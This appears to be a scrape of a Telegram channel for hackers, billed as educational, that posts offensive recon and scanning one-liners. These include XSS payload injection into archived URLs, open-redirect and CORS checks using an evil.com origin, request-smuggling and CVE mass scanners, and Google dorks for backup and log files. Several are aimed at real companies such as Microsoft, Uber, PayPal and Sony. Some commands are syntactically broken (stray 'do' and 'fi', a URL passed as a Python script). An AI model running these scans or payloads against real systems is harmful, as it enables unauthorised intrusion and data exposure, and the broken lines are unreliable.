#Beacon
1.19K subscribers
272 photos
26 videos
130 files
1.83K links
Прожаренный цуберпохек

[educational channel/white hat only] - do not try the knowledge from here on your home or other people's microwaves
Download Telegram
echo 'dod' | metabigor net --org -v | awk '{print $3}' | sed 's/[[0-9]]\+\.//g' | xargs -I@ sh -c 'prips @ | hakrevdns | anew'
#backup finder

gau -subs $targe | deduplicate --hide-images --sort | httpx -silent | grep -iE '(\.(sql|bak|log))' | tee -a sensitive_files
waybackurls $target | grep '=' |qsreplace '"><script>alert(1)</script>' | while read host do ; do curl -s --path-as-is --insecure "$host" | grep -qs "<script>alert(1)</script>" && echo "$host \033[0;31m" Vulnerable;done
waybackurls microsoft.com | grep '=' |qsreplace '"><svg/onload=alert(1337)>'| while read host do ; do curl -s --path-as-is --insecure "$host" | grep -qs "<svg/onload=alert(1337)>" && echo "$host \033[0;31m" Vulnerable;done
OpenRedirect

export LHOST="http://localhost"; gau $1 | gf redirect | qsreplace "$LHOST" | xargs -I % -P 25 sh -c 'curl -Is "%" 2>&1 | grep -q "Location: $LHOST" && echo "VULN! %"'
XSS

gospider -S targets_urls.txt -c 10 -d 5 --blacklist ".(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|ico|pdf|svg|txt)" --other-source | grep -e "code-200" | awk '{print $5}'| grep "=" | qsreplace -a | dalfox pipe | tee result.txt
Find JS Files

assetfinder site.com | gau|egrep -v '(.css|.png|.jpeg|.jpg|.svg|.gif|.wolf)'|while read url; do vars=$(curl -s $url | grep -Eo "var [a-zA-Zo-9_]+" |sed -e 's, 'var','"$url"?',g' -e 's/ //g'|grep -v '.js'|sed 's/.*/&=xss/g'):echo -e "\e[1;33m$url\n" "\e[1;32m$vars";done
Google dorks

site:$target ext:odt |ext:rtf |ext:sxw |ext:bkf |ext:bkp |ext:old |ext:backup |ext:psw |ext:bak |ext:log |ext:logs |ext:csv |ext:xls |ext:xlsx |ext:doc |ext:docx |ext:docs
Google dork

site:http://box.com "$TARGET"
Sensetive data in JS files

gau $target | grep -iE '\.js' | grep -ivE '\.json' | sort -u > $target.JS.txt; cat $target.JS.txt | while read line ; do python3 http://linkfinder.py -i $line -o cli; fi; done
Csrf scanner

python3 bolt.py -u http://uber.com -l 5 -t 10
CVE Scanner

#!/bin/bash
target=$1
wget -nv -nc http://chaos-data.projectdiscovery.io/$target.zip; unzip $target.zip ; cat *.txt | httpx -silent -threads 300 > $target.alive; cat $target.alive | jaeles scan -s ~/jaeles-signatures/cves/ -c 100 ; nuclei -l $target.alive -t ~/nuclei-templates/cves
Smuggler Finder

assetfinder $target > subs.txt; cat subs.txt | httpx -threads 300 -silent | python3 smuggler.py

shodan domain http://sony.com | awk '{print $3}' | httpx -silent | rush -j 3 'python3 smuggler.py -u {}'
Automation tool for recon, bug hunting / pentest

cat hosts.txt | nuclei -t /path/to/nuclei-templates -severity critical,high,medium
Sensetive Finder

domain="http://paypal.com";shodan domain $domain | awk -v domain="$domain" '{print $1"."domain}'| httpx -threads 300 | anew shodanHostsUp | xargs -I@ -P3 sh -c 'jaeles -c 300 scan -s ~/.jaeles/base-signatures/sensitive/ -u @| anew JaelesShodanHosts'
XSS

shodan domain TARGET | awk '{print $3}'| httpx -silent | xargs -I@ sh -c 'python3 xsstrike.py -u @ --crawl'
CVE

wget https://chaos-data.projectdiscovery.io/lime.zip -nv ; unzip http://lime.zip ; cat *.txt >> lime.txt ; cat lime.txt | httpx -silent -threads 200 | gau -subs -retries 2| anew | rush -j 3 'jaeles scan -s /jaeles-signatures/ -u {}'
JS Finder

cat target.txt | httpx -silent | subjs | anew


gau $target |grep -iE '\.js'|grep -ivE '\.json'| sort -u >> attJS.txt
CORS Scanner

assetfinder http://fitbit.com | httpx -threads 300 -follow-redirects -silent | rush -j200 'curl -m5 -s -I -H "Origin:http://evil.com" {} | [[ $(grep -c "http://evil.com") -gt 0 ]] && printf "\n\033[0;32m[VUL TO CORS] - {}\e[m"' 2>/dev/null